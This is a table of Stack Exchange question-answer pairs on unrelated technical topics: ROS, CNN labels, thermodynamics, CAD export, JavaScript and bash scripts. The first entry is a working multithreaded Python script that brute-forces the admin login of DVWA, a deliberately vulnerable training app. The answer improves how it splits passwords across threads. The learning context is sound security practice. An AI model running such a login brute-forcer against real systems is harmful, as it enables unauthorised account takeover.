anchor stringlengths 0 150 | positive stringlengths 0 96k | source dict |
|---|---|---|
Multithreaded password cracker | Question: I am learning infosec with DVWA (Damn Vulnerable Web Application). At first I've decided to write something to brute force admin login screen. I've downlaoded a list of most commonly used passwords and created a script which takes them and attempts to log in. What do you think of it, what could be improved?
#!/usr/bin/env python3
import threading
import requests
URL = 'http://localhost/login.php'
PASSWORD_FILE_NAME = 'common-passwords.txt'
entry_found = False
def create_threads(passwords):
password_list_split_points = [
(0, len(passwords) // 4),
(len(passwords) // 4 + 1, len(passwords) // 2),
(len(passwords) // 2 + 1, 3 * (len(passwords) // 4)),
(3 * (len(passwords) // 4) + 1, len(passwords) - 1),
]
thread_list = [threading.Thread(
target=run_cracker,
args=(
passwords[split_point[0] : split_point[1]]
)
) for split_point in password_list_split_points]
return thread_list
def run_cracker(*passwords):
global entry_found
for password in passwords:
if entry_found:
break
# Passwords still contain last \n char which has to be stripped.
if crack_password(password.rstrip()):
# This is set to True only once. No need for sync mechanisms.
entry_found = True
def crack_password(password):
print('[*] Trying password: "{}" ...'.format(password))
response = requests.post(
URL,
data={'username': 'admin', 'Login': 'Login', 'password': password}
)
if bytes('Login failed', encoding='utf-8') not in response.content:
print('[*] Login successful for username: {} password: {}'.format(
'admin', password
))
return True
else:
return False
if __name__ == '__main__':
with open(PASSWORD_FILE_NAME) as password_file:
passwords = password_file.readlines()
thread_list = create_threads(passwords)
for thread in thread_list:
print('[*] Running thread: {}.'.format(thread.getName()))
thread.start()
for thread in thread_list:
print('[*] Wating for {} to join.'.format(thread.getName()))
thread.join()
Answer: Recommendations
Right now the create_threads function is skipping passwords and is hard-coded to only work with four threads. I'll go over ways to fix both of these issues.
The password skipping occurs because taking a slice of a Python list is a non-inclusive operation.
For example:
n = 100
a = range(n)
b = a[0 : n // 4] # equals [0, 1, ... , 23, 24]
c = a[n // 4 + 1 : n // 2] # equals [26, 27, ..., 47, 48]
Notice that a[25] is being skipped. You can fix this by slicing a in the following way: [a[i : i + n // 4] for i in range(0, n, n // 4)]
The problem is that this solution assumes that n % 4 == 0. Or, to bring it back to your code, that len(passwords) % 4 == 0. In the code below we can fix this issue by keeping track of the value of the modulus operation in the variable m. If m != 0 then we can replace the last list (in our list of password slices, xs) with the appropriate slice.
Fortunately all of this makes it easier to replace the hard-coded thread number with a variable (t in the code below).
Code
def create_threads(t, passwords):
n = len(passwords)
x = n // t
m = n % t
xs = [passwords[i:i+x] for i in range(0, n, x)]
if m:
xs[t-1:] = [passwords[-m-x:]]
assert(sum([len(l) for l in xs]) == n)
return [
threading.Thread(target=run_cracker, args=(l)) for l in xs
] | {
"domain": "codereview.stackexchange",
"id": 28276,
"tags": "python, python-3.x, multithreading, security"
} |
training when Multiple labels per image | Question: I have multiple labels per image. is it better to train taking each each label separately or should i mark all the labels present as 1 in the same image? which method is better? i will be using CNN architecture
Answer: Assuming you want to classify the images (and not use bounding boxes to locate classes within each image), a common way it to create a target vector for each image, which holds the information regarding all classes and is what the model would eventually predict.
If you have a dataset with, say 5 classes, and your first example image contains classes 1 and 4, you would create your target vector for that image to be:
example_sample = ... # your image array
example_sample_y = [1, 0, 0, 1, 0]
This is a kind of one-hot encoding, as the vector has a placeholder for each of the 5 classes, but only a 1 when the class is present.
Have a look at this high-level walkthrough.
I think your other suggestion of training an image
You want to learn some kind of joint probability between the classes, and in my opinion, training one the same image with different outcomes (e.g. the sample image above twice, producing either a 1 or a 4) will not only be very inefficient during training, but will also be mathematically confusing. The same input can give 2 possible outputs! This implies your underlying function that maps images to classes is not well-defined. That isn't usually a good thing! | {
"domain": "datascience.stackexchange",
"id": 3963,
"tags": "deep-learning, cnn"
} |
multi-threaded rospy.get_param() crashes: CannotSendRequest and ResponseNotReady | Question:
Hi all,
I work with the sushi repository from the ICRA Mobile Manipulation Challenge.
When instantiating the ArmMover I get "CannotSendRequest" and "ResponseNotReady" exceptions. The ArmMover class creates multiple ArmMoverWorker, which run their own threads. The reason for the crash seems to be requests to the parameter server from multiple threads.
Can the parameter server process multiple requests from different threads running on the same node?
As a workaround I moved the parameter requests into the constructor of the ArmMoverWorker (before the thread is started) and then it works fine.
Originally posted by Andy on ROS Answers with karma: 31 on 2012-06-19
Post score: 2
Original comments
Comment by dornhege on 2012-06-21:
Can anyone else using the Sushi code verify this? Running move_arms_to_side.py with simulation causes this.
Answer:
To me this looks like a bug in rospy. You should probably file a ticket at https://code.ros.org/trac/ros/.
Originally posted by Lorenz with karma: 22731 on 2012-06-19
This answer was ACCEPTED on the original site
Post score: 0 | {
"domain": "robotics.stackexchange",
"id": 9847,
"tags": "ros, rospy, multi-thread, parameter-server"
} |
Light (Photon) reflecting from an accelerated mirror | Question: Is there well know formulas (or some articles) from General Relativity how photon (light) is changing (how frequency is changing) while reflecting from the accelerated mirror?
I suspect it should be different from the reflecting from just moving mirror with constant speed because accelerated mirror is Non-inertial reference frame and general relativity is applicable in that case.
UPDATE 1
After some comments, I want to clarify the question. What will happen in the picture below? Let's say I have a harmonically oscillating mirror x(t) = Sin(t) on my desk. The blue line is the mirror, red/orange circle is a photon. I put values of coordinate x, speed v and acceleration a on top of the image.
At the point x=1, v=0 and a=1. It looks strange, how is it possible v=0, but a is not. But it is the same if we throw a stone up. Acceleration is always g, but at the top point, speed is zero. At this point where x=1, v=0, a=1 photon is falling on the mirror.
The question is what will happen with photon frequency from my side (if this oscillating mirror is on my desk)? What will I see?
I change colour from red to orange (blueshift), because I assumed, that acceleration direction is from right to left, that means fictitious force will be in opposite direction, which is equivalent to gravitational force from left to right and photon is reflecting to the source of gravitational force (to the source of the gravity). Or it is not correct? Maybe I will not see any changes and all changes will be visible only for the observer on the mirror?
Also what if the photon hits the mirror when speed is not zero and acceleration is not zero? Will I see only Doppler shift or something different?
Of course, I understand, that in real life with the real oscillating mirror on the desk with any achievable speed any difference in frequency will be undetectable, but I just want to know theoretically with the assumption, that I can detect very very small changes in frequency.
Answer: If we assume the plane of the mirror is perpendicular to the acceleration, the situation is the same as the situation where the mirror is (horizontally) at rest in a gravitational field. When a photon (moving downwards) approaches the mirror its frequency increases. The moment the photon hits the mirror its (vertical) direction is reversed but its frequency doesn't change. After the reflection, the photon's frequency decreases while travelling upwards. These three processes, in which I divided up the total process, each conserve the energy ($(\frac{hc}{\lambda})^2$) of the photon.
See this article for the change in frequency of the light. | {
"domain": "physics.stackexchange",
"id": 59398,
"tags": "general-relativity, visible-light, photons, acceleration"
} |
Messing with the past: Endless loop, or alternate timelines? | Question: Let's take the following scenario:
A person finds a time machine. He uses it to travel to the past, and
kills his grandparents. Now because of this, his parents are never
born, they do not meet, and he himself ceases to exist.
I have heard one predominant result of this murder:
Since he killed his grandparents, he doesn't exist. Therefore, he
could not have gone into the past and committed the murders.
Therefore, he exists. Therefore, he doesn't exist and so on, ad
infinitum.
However, I think that instead of an endless loop, we would end up with an altered timeline:
Since the grandparents are dead, they no longer exist. Anything they
might have done to the world in the normal timeline after their deaths
doesn't happen. Time moves on, and we come to the present day. There
is no boy, no parents, no grandparents. The loop doesn't happen,
because the grandparents are already dead. It doesn't matter that the
boy isn't there to kill them again.
So which would be a more accurate expectation? Or is there a third option that I'm missing completely?
I am looking for answers from a purely physics perspective.
Answer:
which would be a more accurate expectation?
Since this is a Physics Q&A forum, we should approach this question from the perspective of Physics.
Until you have a hypothesis for the mechanism by which matter can be instantaneously moved from one point in time to a prior point in time, you have nothing on which to base predictions.
So far as I know, there is a maximum speed that we can move through spacetime. If I were to move backwards in time, at the very least I would expect to gradually get smaller and younger, to know less and have my memories slowly evaporate. | {
"domain": "physics.stackexchange",
"id": 4788,
"tags": "waves, time-travel"
} |
Method to extract closed curve from 3D CAD into CSV or TXT | Question: I have engineering data emerging from more or less complex constructions.
On a regular base I need outlines from construction data to perform geometric calculations on them. The construction data comes from different CAD packages (e.g. Inventor or SolidWorks). I basically need certain closed polygons stored in a way I can read it with primitive methods like sloppy designed PERL programs.
Edit: The polygons are planar. I.e. the data I want to process is 2D. Basically it often is an outline of a 3D object, e.g. a housing.
So my favourite input format for such extracted polygon data is a CSV-file or plain text with whatever separators are available.
As most CAD-SW can import 3D-Models saved in STEP, I practically can choose which software I use to save the polygon data. The outcome is, I will probably end up having DXF or DWG files, which are the most primitive CAD-files I can get from that.
This leaves me with getting my polygons out of that goddamn DXF into a CSV file. Does anyone have an (preferably) easy way to do that?
Addendum: For increased clarificaiton, I describe my task. I have to design PCBs which fit nicely into oddly shaped housings. While my EDA-sw exhibits a fairly usable routine for importing DXF-data, my self programmed autoplacer does not. So in my EDA file, I may have a nice outline, but this does not help me with placing the components inside that polygon. Hence I need the polygon data separately in my autoplacer.
Answer: It seems you are interested in a flat slice of your CAD model. While you could use a 3D file and slice it yourself that seems like a bit overkill as the CAD application is perfectly capable of doing the slices for you.
quick and dirty
Ok, so each CAD has a 2D drawing mode, you can save that drawing out as dxf or pdf both are easy to parse. If you don't happen to find a good tool for this turn the pdf into svg that can be easier to parse. This approach can also be done quick and dirty by leveraging such tools as Inkscape or Illustrator. Lets do an example because its easy to do:
Image 1: Quick and dirty export drawing as pdf/svg then isolate and read points from that file I used modified version this tool to dump coordinates from pdf. You should be able to do that in Perl easily. data available here
Proper Method
It is possible to access both SolidWorks and Inventor trough a COM bridge so you can access the CAD applications data model directly from your Perl code.This has several benefits but mostly not needing to parse intermediate files. You could select the relevant edges and just traverse them directly from the CAD. Now I only have access to SolidWorks at work but similar approach works in inventor as i have done it.
I had some extra time at work to do some quick VBA code for SolidWorks. The code takes all the lines of a closed sketch, sorts them into polygon (with a naive N^2 algorithm) order and prints them in the VBA debug console.
Option Explicit
Sub main()
Dim swApp As SldWorks.SldWorks
Dim swModel As SldWorks.ModelDoc2
Dim swPart As SldWorks.PartDoc
Dim swSelMgr As SldWorks.SelectionMgr
Dim swFeat As SldWorks.Feature
Dim swSketch As SldWorks.Sketch
Dim numLines As Long
Dim vLines As Variant
Dim dict As New Collection
Dim i As Variant
Set swApp = CreateObject("SldWorks.Application")
Set swModel = swApp.ActiveDoc
Set swPart = swModel
Set swSelMgr = swModel.SelectionManager
Set swFeat = swSelMgr.GetSelectedObject5(1)
Set swSketch = swFeat.GetSpecificFeature2
numLines = swSketch.GetLineCount2(1) 'Exclude crosshatch lines
vLines = swSketch.GetLines2(1) 'Exclude crosshatch lines
Dim startP, endP, line As Variant
For i = 1 To numLines - 1
line = Array(Array(vLines(12 * i + 6) * 1000, _
vLines(12 * i + 7) * 1000), _
Array(vLines(12 * i + 9) * 1000, _
vLines(12 * i + 10) * 1000))
dict.Add (line)
Next i
startP = Array(vLines(6) * 1000, _
vLines(7) * 1000)
endP = Array(vLines(9) * 1000, _
vLines(10) * 1000)
pp startP
pp endP
For i = 1 To dict.Count - 1
endP = NextPoint(dict, endP)
pp endP
Next i
End Sub
Sub pp(point As Variant)
Debug.Print " " & Str(point(0)) & ", " & Str(point(1))
End Sub
Function NextPoint(dict As Collection, point As Variant) As Variant
Dim i As Variant
For i = 1 To dict.Count
Dim data, startRP, endRP As Variant
data = dict.Item(i)
startRP = data(0)
endRP = data(1)
If endRP(0) = point(0) And endRP(1) = point(1) Then
dict.Remove (i)
NextPoint = startRP
Exit Function
End If
If startRP(0) = point(0) And startRP(1) = point(1) Then
dict.Remove (i)
NextPoint = endRP
Exit Function
End If
Next i
End Function
Since vba is calling COM you ca code you can use nearly any language for example perl implements Win32::OLE that can do the job.
Image 2: Example part with simple one loop sketch results in this output
Epilogue
If you really want to export 3D polygon data and do the slicing manually then i would export either OBJ or STL. But this would be way down on my list of approaches mainly because all other approaches are simpler. | {
"domain": "engineering.stackexchange",
"id": 1059,
"tags": "cad"
} |
Why does a substance with an endothermic heat of solution dissolve? | Question: How does a substance with an endothermic heat of solution dissolve?
Answer: Dissolution happens in three steps.
Solute-solute attractions must be broken (consumes energy, endotherm), solvent-solvent attractions must be broken (also endotherm), and finally solute-solvent attractions form. This results in a lower energy state and is exotherm.
Dissolution will be endotherm if it takes more energy to break the mentioned attractions, than is released in the last step. You are asking then, why is this reaction spontaneous? In other words, why does it occur? To find out we need chemical thermodynamics. $$\Delta G=\Delta H - T\Delta S$$
$\Delta G$ = Change in Gibb's free energy for a reaction. $\Delta G<0$ = reaction is spontaneous. Otherwise it is NOT spontaneous (ie. will not occur on its own).
$\Delta H$ = Change in enthalpy. $\Delta H <0$ = reaction is exotherm. If larger than 0, the reaction is endotherm. Already now we can see that an endotherm reaction will make $\Delta G$ for the reaction more positive, and thus the reaction is less likely to be spontaneous.
$T$ = temperature in K.
$\Delta S$ = Change in entropy. $\Delta S > 0$ = reaction leads to a state of higher entropy. Entropy describes disorder in a system. Dissolution of a solute in a solvent will always lead to a state of higher disorder, since we go from having all the solute concentrated in a cluster (more ordered) to being spread evenly throughout the solution (more disordered). We can see from the equation that if the reaction leads to higher entropy, then higher temperatures increase likeliness of $\Delta G < 0$, and the reaction will be spontaneous. On the other hand, if we're going to a more ordered state, lower temperatures increase likelihood for a spontaneous reaction.
So how do we apply this to dissolution?
You know that the dissolution reaction is endotherm. That means that $\Delta H > 0$ for this particular reaction. Yet we know that the reaction is spontaneous, since you report that it does indeed occur! This means $\Delta G < 0$. The only way to make that happen is for $\Delta S$ to be positive. So the reaction must go to a more disordered state. Since it's a dissolution, we know that it does. The solute goes from being concentrated in a cluster (ordered) to being spread throughout the solvent (disordered). Pay attention to where temperature is in the equation. It is quite easy to see, that for a dissolution reaction where $\Delta S > 0$, you can increase the chance of the reaction being spontaneous by increasing temperature!
Bottom line
Your dissolution reaction is endotherm, but because dissolution reactions lead to states of higher entropy, your particular reaction is spontaneous (it occurs) at your specific temperature nonetheless! If it wasn't, heating the system could make it so. | {
"domain": "chemistry.stackexchange",
"id": 326,
"tags": "heat"
} |
How is the backbone of two neural networks trained? | Question: Suppose, I have a backbone network(convolutional neural network). After this network ends, the output is fed into two neural networks. Both building on the outputs of the feature extractor(CNN). Now if I want to train this complete network from scratch on two different tasks, the weights of the layers after the backbone network can be updated easily, but how should I update the weights of the backbone network. I mean I can compute gradients with respect to two losses, shall I take the mean for the gradients in the backbone or it has to be some weighted sum? if it is the weighted sum then how would the parameters of the weighted sum be updated?
Thanks
Answer: In General any sort of Gradient-based learning is done on scalar functions, so those functions f: ℝ^n ↦ ℝ. (In fact this is the meaning of a Gradient). Mainly if you want to define any minimization problem, you need a single value to minimize and not more.
This means: Ultimately your loss always has to be a scalar (a single number). Combining the gradients in the middle (so before backpropping into your backbone) would ultimately be equal to just combining the losses. And a weighted loss will be easier to implement.
For reference, you can look this talk by A. Kaparthy on how Tesla does multi-task learning on a single Backbone and how they deal with combining different losses. | {
"domain": "datascience.stackexchange",
"id": 8015,
"tags": "neural-network"
} |
Rayleigh scattering and dimension of oscillator compared to wavelenght | Question: Why is Rayleigh scattering suitable only for cases where the oscillator dimensions are much smaller than incindent wavelenght?
Answer: That's the definition of Rayleigh scattering: it's what happens when you scatter light (or other EM waves) off of particles whose size is much smaller than the wavelegth. If you have particles that are comparable to or bigger than the wavelength, then you get Mie scattering. | {
"domain": "physics.stackexchange",
"id": 42967,
"tags": "electromagnetism, scattering, diffusion"
} |
ROS inside part of a c++ project | Question:
Hi.
I've a c++ project where I'm using CMakeList with the structure similar to:
Project (inside my ros sandbox)
|
|_Folder1
|___some code
|___CMakeLists.txt
|
|_Folder2
|___some code
|___CMakeLists.txt
|
|_ROS package folder
|___some code
|___CMakeLists.txt
|
|_CMakeLists.txt
Inside de main CMakeLists.txt I've something similar to:
add_subdirectory(recruiter)
add_library(something_static STATIC ${RECRUITER_SOURCES})
Where inside "recruiter" directory is the ROS package, created using "roscreate-pkg".
And I'm getting the following error:
[rosbuild] Error from directory check: /opt/ros/groovy/share/ros/core/rosbuild/bin/check_same_directories.py /opt/ros/groovy/stacks/test/noderecruiter
1
Traceback (most recent call last):
File "/opt/ros/groovy/share/ros/core/rosbuild/bin/check_same_directories.py", line 46, in
raise Exception
Exception
CMake Error at /opt/ros/groovy/share/ros/core/rosbuild/private.cmake:102 (message):
[rosbuild] rospack found package "test" at "", but the current
directory is "/opt/ros/groovy/stacks/test/noderecruiter". You
should double-check your ROS_PACKAGE_PATH to ensure that packages are found
in the correct precedence order.
Call Stack (most recent call first):
/opt/ros/groovy/share/ros/core/rosbuild/public.cmake:177 (_rosbuild_check_package_location)
server/noderecruiter/CMakeLists.txt:12 (rosbuild_init)
-- Configuring incomplete, errors occurred!
What's happening?
THanks.
Originally posted by Verane on ROS Answers with karma: 25 on 2013-06-24
Post score: 0
Original comments
Comment by dornhege on 2013-06-24:
Are you building with catkin? I think ROS/catkin needs the toplevel.cmake to work.
Comment by Verane on 2013-06-24:
No, I would like to build like a normal project.
Comment by allenh1 on 2013-06-24:
Could you please post your CMakeLists.txt file in full? It would be good to see the context of your build output.
Comment by Verane on 2013-06-25:
What CMakeLists do you want? The file inside the main project or the ros one?
Answer:
ROS packages are not designed to simply be included inside CMake packages. This is not a supported use case.
Originally posted by tfoote with karma: 58457 on 2013-08-12
This answer was ACCEPTED on the original site
Post score: 1 | {
"domain": "robotics.stackexchange",
"id": 14675,
"tags": "ros, c++, cmake"
} |
Javascript refactor if condition function | Question: I have this function
const rank = (totalPoints, pointsRank) => {
if (totalPoints <= pointsRank[0]) {
return ({
rank: 1,
pointsLeftForNextRank: (pointsRank[1] - totalPoints)
})
} else if (totalPoints >= pointsRank[1] && totalPoints < pointsRank[2]) {
return ({
rank: 2,
pointsLeftForNextRank: (pointsRank[2] - totalPoints)
})
} else if (totalPoints >= pointsRank[2] && totalPoints < pointsRank[3]) {
return ({
rank: 3,
pointsLeftForNextRank: (pointsRank[3] - totalPoints)
})
} else if (totalPoints >= pointsRank[3] && totalPoints < pointsRank[4]) {
return ({
rank: 4,
pointsLeftForNextRank: (pointsRank[4] - totalPoints)
})
} else if (totalPoints >= pointsRank[4] && totalPoints < pointsRank[5]) {
return ({
rank: 5,
pointsLeftForNextRank: (pointsRank[5] - totalPoints)
})
} else if (totalPoints >= pointsRank[5] && totalPoints < pointsRank[6]) {
return ({
rank: 6,
pointsLeftForNextRank: (pointsRank[6] - totalPoints)
})
} else if (totalPoints >= pointsRank[6]) {
return ({
rank: 7,
pointsLeftForNextRank: 0
})
}
}
module.exports = rank
and I call it like this
let pointsRank = [150, 500, 1000, 2000, 3500, 5000, 5500]
let totalPoints = 1200
rank(totalPoints, pointsRank)
output
{ rank: 3, pointsLeftForNextRank: 600 }
how can I improve this function? I feel like that I wrote a lot of code which can be refactored into something smaller
like a small amount of code that does the same functionality
also, I need to know if am violating any of the SOLID principles
Answer: Basically we search for the most close number from array where our number belongs. After we find the min value, we take the index of it and add 1, because the rank starts from 1
//rank 1 : 150 - 500
//rank 2 : 500 - 1000
//rank 3 : 1000 - 2000
//rank 4 : 2000 - 3500
//rank 5 : 3500 - 5000
//rank 6 : 5000 - 5500
let pointsRank = [150, 500, 1000, 2000, 3500, 5000, 5500]
function rank(pointsRank, score) {
var closest = pointsRank.reduce(function(prev, curr) {
return (Math.abs(curr - score) < Math.abs(prev - score) ? curr : prev);
});
var rank = pointsRank.indexOf(closest) + 1; // cuz starts from 0 and we don't have rank 0
console.log("min range: " + closest +
" | our score: " + score +
" | max range: " + pointsRank[rank])
return {
rank: rank,
pointsLeftForNextRank: (pointsRank[rank] - score)
}
}
const test1 = rank(pointsRank, 1200);
const test2 = rank(pointsRank, 2000);
const test3 = rank(pointsRank, 3700);
console.log(test1);
console.log(test2);
console.log(test3); | {
"domain": "codereview.stackexchange",
"id": 37074,
"tags": "javascript"
} |
Rename files by editing their names in an editor | Question: Inspired by a recent question to rename files by editing the list of names in an editor, I put together a similar script.
Why: if you need to perform some complex renames that are not easy to formulate with patterns (as with the rename.pl utility), it might be handy to be able to edit the list of names in a text editor, where you will see the exact names you will get.
Features:
Edit names in a text editor
Use the names specified as command line arguments, or else the files and directories in the current directory (resolve *)
Use a sensible default text editor
According to man bash, READLINE commands try $VISUAL or else $EDITOR -> looks like a good example to follow.
Abort if cannot determine a suitable editor.
Abort (do not rename anything) if the editor exits with error
Paths containing newlines are explicitly unsupported
Perform basic sanity checks: the edited text should have the same number of lines as the paths to rename
Here's the script:
#!/usr/bin/env bash
#
# SCRIPT: mv-many.sh
# AUTHOR: Janos Gyerik <info@janosgyerik.com>
# DATE: 2019-07-27
#
# PLATFORM: Not platform dependent
#
# PURPOSE: Rename files and directories by editing their names in $VISUAL or $EDITOR
#
set -euo pipefail
usage() {
local exitcode=0
if [[ $# != 0 ]]; then
echo "$*" >&2
exitcode=1
fi
cat << EOF
Usage: $0 [OPTION]... [FILES]
Rename files and directories by editing their names in $editor
Specify the paths to rename, or else * will be used by default.
Limitations: the paths must not contain newline characters.
EOF
if [[ $editor == *vim ]]; then
echo "Tip: to abort editing in $editor, exit with :cq command."
fi
cat << "EOF"
Options:
-h, --help Print this help
EOF
exit "$exitcode"
}
fatal() {
echo "Error: $*" >&2
exit 1
}
find_editor() {
# Following READLINE conventions, try VISUAL first and then EDITOR
if [[ ${VISUAL+x} ]]; then
echo "$VISUAL"
return
fi
# shellcheck disable=SC2153
if [[ ${EDITOR+x} ]]; then
echo "$EDITOR"
return
fi
fatal 'could not determine editor to use, please set VISUAL or EDITOR; aborting.'
}
editor=$(find_editor)
oldnames=()
while [[ $# != 0 ]]; do
case $1 in
-h|--help) usage ;;
-|-?*) usage "Unknown option: $1" ;;
*) oldnames+=("$1") ;;
esac
shift
done
work=$(mktemp)
trap 'rm -f "$work"' EXIT
if [[ ${#oldnames[@]} == 0 ]]; then
oldnames=(*)
fi
printf '%s\n' "${oldnames[@]}" > "$work"
"$editor" "$work" || fatal "vim exited with error; aborting without renaming."
mapfile -t newnames < "$work"
[[ "${#oldnames[@]}" == "${#newnames[@]}" ]] ||
fatal "expected ${#oldnames[@]} lines in the file, got ${#newnames[@]}; aborting without renaming."
for ((i = 0; i < ${#oldnames[@]}; i++)); do
old=${oldnames[i]}
new=${newnames[i]}
if [[ "$old" != "$new" ]]; then
mv -vi "$old" "$new"
fi
done
What do you think? I'm looking for any and all kinds of comments, suggestions, critique.
Answer: Looks pretty good to me, and to Shellcheck too.
find_editor is quite long-winded; it could be a one-liner:
editor=${VISUAL:-${EDITOR:?could not determine editor to use, please set VISUAL or EDITOR; aborting.}}
There's a couple of Vim-isms remaining. The test if [[ $editor == *vim ]] could be generalised to a case "$editor" in … esac to support adding more editor hints, but more significantly, we have an error message that mentions vim where $editor would be more appropriate.
The current implementation is very simplistic when the new names might overlap with the old names. We might need a topological sort to perform the renames in the correct order in that case.
Perhaps it should be an error if the user asks for two or more files to be moved to the same target name? | {
"domain": "codereview.stackexchange",
"id": 43022,
"tags": "bash, shell, rags-to-riches"
} |
Clausius Inequality and Thermodynamic Potentials | Question: One statement of the Clausius inequality is
$$dS \geq \frac{\delta q}{T}$$
where $\delta q$ is the exchanged heat. My understanding is that $T$ refers to the temperature of the surroundings rather than the temperature of the system itself. This is because when deriving the Clausius inequality, we use
$$dS = dS_\text{proc} + dS_\text{exch}$$
where the total entropy change of the system is the change in the entropy due to a spontaneous process plus the change in entropy due to heat exchange with surroundings. Since the surroungings are kept in thermal equilibrium, it follows that $dS_\text{exch} = -dS_\text{surr} =\frac{\delta q}{T}$ where $T$ is the tempreature of the surroundings. Since $dS_\text{proc}\geq 0$ (with equality only in the case of a reversible process), we obtain the Clausius inequality.
However, when considering thermodynamic potentials, it seems that $T$ is used to refer to temperature of the system rather than the temperature of the surroundings. For example, to derive the spontaneity criterion for Helmholtz free energy, we use
$$dA = dU - TdS - SdT = \delta q + PdV - TdS - SdT.$$
At constant $T$ and $V$, this becomes
$$dA = \delta q - TdS$$
and we use the Clausius inequality to state $dA \leq 0$. In this derivation, however, it seems that $T$ refers to the temperature of the system rather than the surroundings, so I am not sure how the Clausius inequality can be correctly applied here.
Answer: Your interpretation of the Clauius inequality is correct, and T is the temperature of the surroundings. However, your interpretation of how the Helmholtz free energy is applied is incorrect. In the case of applying the Helmholtz free energy. we assume that for both reversible and irreversible processes on a closed system, the surroundings are constantly maintained at the same temperature as the initial temperature of the system T throughout the process for both reversible and irreversible processes. So from the first law of thermodynamics, we have $$\Delta U=Q-W$$ and, from the 2nd law of thermodynamics we have $$\Delta S=\frac{Q}{T}+\sigma$$, where $\sigma$ is the generated entropy. If we combine these two equations, we obtain: $$\Delta U=T\Delta S-T\sigma-W$$or under these constant external temperature conditions, $$\Delta A=-W-T\sigma$$or$$W=-\Delta A-T\sigma$$So, for a given pair of end states, the maximum work that the system can do is for a reversible path, and is equal to $-\Delta A$. For irreversible paths between the same two end states, the irreversible work is less than for the reversible path. Again, all this applies only to cases where the surroundings are maintained at the same temperature as the initial temperature of the system. | {
"domain": "physics.stackexchange",
"id": 99990,
"tags": "thermodynamics, entropy"
} |
Hello guys, Has anyone used the evaluation scripts provided in RGBDSLAM_v2 with the .bag files obtained directly from the package GUI? | Question:
I'm trying with this comand: ./run_tests.sh [rgbd_dataset_freiburg1_xyz.bag]
And I got this:
[rospack] Error: package 'rgbdslam' not found
Evaluating ORB
Will evaluate RGBD-SLAM on the following bagfiles:
ORB_home_newcalibpar.bag rgbd_dataset_freiburg1_desk.bag rgbd_dataset_freiburg1_xyz.bag
[rospack] Error: package 'rgbdslam' not found
14:34:31 Results for ORB_home_newcalibpar are stored in /home/elizeu/rgbdslam_catkin_ws/src/rgbdslam_v2-indigo/test/[rgbd_dataset_freiburg1_xyz.bag]/emm__0.00/CANDIDATES_4/RANSAC_100/OPT_SKIP_10/ORB/600_Features/ORB_home_newcalibpar
14:34:33 Finished processing ORB_home_newcalibpar
mv: cannot stat ‘ORB_home_newcalibpar.bag?’: No such file or directory
cp: cannot stat ‘ORB_home_newcalibpar-groundtruth.txt’: No such file or directory
cp: cannot stat ‘/test/test_settings.launch’: No such file or directory
[rospack] Error: package 'rgbdslam' not found
14:34:33 Results for rgbd_dataset_freiburg1_desk are stored in /home/elizeu/rgbdslam_catkin_ws/src/rgbdslam_v2-indigo/test/[rgbd_dataset_freiburg1_xyz.bag]/emm__0.00/CANDIDATES_4/RANSAC_100/OPT_SKIP_10/ORB/600_Features/rgbd_dataset_freiburg1_desk
14:34:33 Finished processing rgbd_dataset_freiburg1_desk
mv: cannot stat ‘rgbd_dataset_freiburg1_desk.bag?’: No such file or directory
cp: cannot stat ‘rgbd_dataset_freiburg1_desk-groundtruth.txt’: No such file or directory
cp: cannot stat ‘/test/test_settings.launch’: No such file or directory
[rospack] Error: package 'rgbdslam' not found
14:34:33 Results for rgbd_dataset_freiburg1_xyz are stored in /home/elizeu/rgbdslam_catkin_ws/src/rgbdslam_v2-indigo/test/[rgbd_dataset_freiburg1_xyz.bag]/emm__0.00/CANDIDATES_4/RANSAC_100/OPT_SKIP_10/ORB/600_Features/rgbd_dataset_freiburg1_xyz
14:34:33 Finished processing rgbd_dataset_freiburg1_xyz
mv: cannot stat ‘rgbd_dataset_freiburg1_xyz.bag?’: No such file or directory
cp: cannot stat ‘rgbd_dataset_freiburg1_xyz-groundtruth.txt’: No such file or directory
cp: cannot stat ‘/test/test_settings.launch’: No such file or directory
./run_tests.sh: line 70: //rgbd_benchmark/summarize_evaluation.sh: No such file or directory
elizeu@elizeu:~/rgbdslam_catkin_ws/src/rgbdslam_v2-indigo/test$ rosrun rgbdslam summarize_evaluation.sh /home/elizeu/rgbdslam_catkin_ws/src/rgbdslam_v2-indigo/test/[rgbd_dataset_freiburg1_xyz.bag]/emm__0.00/CANDIDATES_4/RANSAC_100/OPT_SKIP_10/ORB/600_Features/rgbd_dataset_freiburg1_xyz
[rospack] Error: package 'rgbdslam' not found
elizeu@elizeu:~/rgbdslam_catkin_ws/src/rgbdslam_v2-indigo/test$ ./run_tests.sh [rgbd_dataset_freiburg1_xyz.bag][rospack] Error: package 'rgbdslam' not found
Evaluating ORB
Will evaluate RGBD-SLAM on the following bagfiles:
ORB_home_newcalibpar.bag rgbd_dataset_freiburg1_desk.bag rgbd_dataset_freiburg1_xyz.bag
[rospack] Error: package 'rgbdslam' not found
14:52:42 Results for ORB_home_newcalibpar are stored in /home/elizeu/rgbdslam_catkin_ws/src/rgbdslam_v2-indigo/test/[rgbd_dataset_freiburg1_xyz.bag]/emm__0.00/CANDIDATES_4/RANSAC_100/OPT_SKIP_10/ORB/600_Features/ORB_home_newcalibpar
14:52:42 Finished processing ORB_home_newcalibpar
mv: cannot stat ‘ORB_home_newcalibpar.bag?’: No such file or directory
cp: cannot stat ‘ORB_home_newcalibpar-groundtruth.txt’: No such file or directory
cp: cannot stat ‘/test/test_settings.launch’: No such file or directory
[rospack] Error: package 'rgbdslam' not found
14:52:42 Results for rgbd_dataset_freiburg1_desk are stored in /home/elizeu/rgbdslam_catkin_ws/src/rgbdslam_v2-indigo/test/[rgbd_dataset_freiburg1_xyz.bag]/emm__0.00/CANDIDATES_4/RANSAC_100/OPT_SKIP_10/ORB/600_Features/rgbd_dataset_freiburg1_desk
14:52:42 Finished processing rgbd_dataset_freiburg1_desk
mv: cannot stat ‘rgbd_dataset_freiburg1_desk.bag?’: No such file or directory
cp: cannot stat ‘rgbd_dataset_freiburg1_desk-groundtruth.txt’: No such file or directory
cp: cannot stat ‘/test/test_settings.launch’: No such file or directory
[rospack] Error: package 'rgbdslam' not found
14:52:42 Results for rgbd_dataset_freiburg1_xyz are stored in /home/elizeu/rgbdslam_catkin_ws/src/rgbdslam_v2-indigo/test/[rgbd_dataset_freiburg1_xyz.bag]/emm__0.00/CANDIDATES_4/RANSAC_100/OPT_SKIP_10/ORB/600_Features/rgbd_dataset_freiburg1_xyz
14:52:42 Finished processing rgbd_dataset_freiburg1_xyz
